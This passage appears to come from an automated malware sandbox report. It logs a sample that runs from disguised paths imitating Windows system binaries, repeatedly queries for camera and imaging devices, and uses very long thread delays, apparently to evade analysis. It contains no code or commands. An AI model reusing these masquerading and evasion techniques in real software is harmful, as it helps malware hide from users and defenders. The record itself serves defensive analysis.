                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeMemory allocated: 1780000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeMemory allocated: 1B230000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeMemory allocated: 10B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeMemory allocated: 1ACF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeMemory allocated: 1AA50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeMemory allocated: 1AEA0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeMemory allocated: 1190000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeMemory allocated: CB0000 memory reserve | memory write watch
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeMemory allocated: 1AA30000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeMemory allocated: 1290000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeMemory allocated: FE0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeMemory allocated: 1A970000 memory reserve | memory write watch
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeMemory allocated: 1130000 memory reserve | memory write watch
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeMemory allocated: 1ABC0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeMemory allocated: AC0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeMemory allocated: 1A770000 memory reserve | memory write watch
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeMemory allocated: 1450000 memory reserve | memory write watch
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeMemory allocated: 1B160000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 600000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 599862
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 3600000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598921
